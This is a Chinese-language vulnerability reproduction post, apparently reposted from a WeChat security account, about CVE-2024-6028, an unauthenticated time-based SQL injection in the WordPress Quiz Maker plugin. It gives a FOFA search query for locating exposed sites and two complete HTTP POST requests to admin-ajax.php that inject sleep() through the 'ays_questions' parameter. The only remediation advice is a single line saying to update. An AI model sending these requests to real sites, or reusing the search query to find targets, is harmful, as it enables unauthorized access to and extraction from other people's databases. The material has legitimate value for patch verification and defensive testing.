CVE-2024-6028 漏洞复现 POC

admin 2024年6月29日02:12:46评论6 views字数 1115阅读3分43秒阅读模式

01 漏洞名称

Quiz Maker SQL注入漏洞

02 漏洞影响

Quiz Maker <= 6.5.8.3

03 漏洞描述

WordPress的Quiz Maker插件在6.5.8.3版本及以下存在基于时间的SQL注入漏洞,漏洞位于“ays_questions”参数上。由于对用户提供的参数缺乏足够的转义处理和对现有SQL查询的充分准备不足,使得未经验证的攻击者能够在已有的查询中附加额外的SQL查询,从而可能从数据库中提取敏感信息。

04 FOFA搜索语句

"/wp-content/plugins/quiz-maker/"

CVE-2024-6028 漏洞复现 POC

05

漏洞复现

POC数据包如下,睡眠5秒

POST /wp-admin/admin-ajax.php HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36Connection: closeContent-Length: 124Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip

ays_quiz_id=1&ays_quiz_questions=1,2,3&quiz_id=1&ays_questions[ays-question-4)+or+sleep(if(1>0,5,0)]=&action=ays_finish_quiz

CVE-2024-6028 漏洞复现 POC

睡眠10秒

POST /wp-admin/admin-ajax.php HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36Connection: closeContent-Length: 124Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip

ays_quiz_id=1&ays_quiz_questions=1,2,3&quiz_id=1&ays_questions[ays-question-4)+or+sleep(if(1>0,10,0)]=&action=ays_finish_quiz

CVE-2024-6028 漏洞复现 POC

漏洞复现成功

06

修复建议

建议您更新当前系统或软件至最新版,完成漏洞的修复。

原文始发于微信公众号(AI与网安):CVE-2024-6028 漏洞复现 POC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月29日02:12:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-6028 漏洞复现 POChttps://cn-sec.com/archives/2895035.html

发表评论

匿名网友 填写信息